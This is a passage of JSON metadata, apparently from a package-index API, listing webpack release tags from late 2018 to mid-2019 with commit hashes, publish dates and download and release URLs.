e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/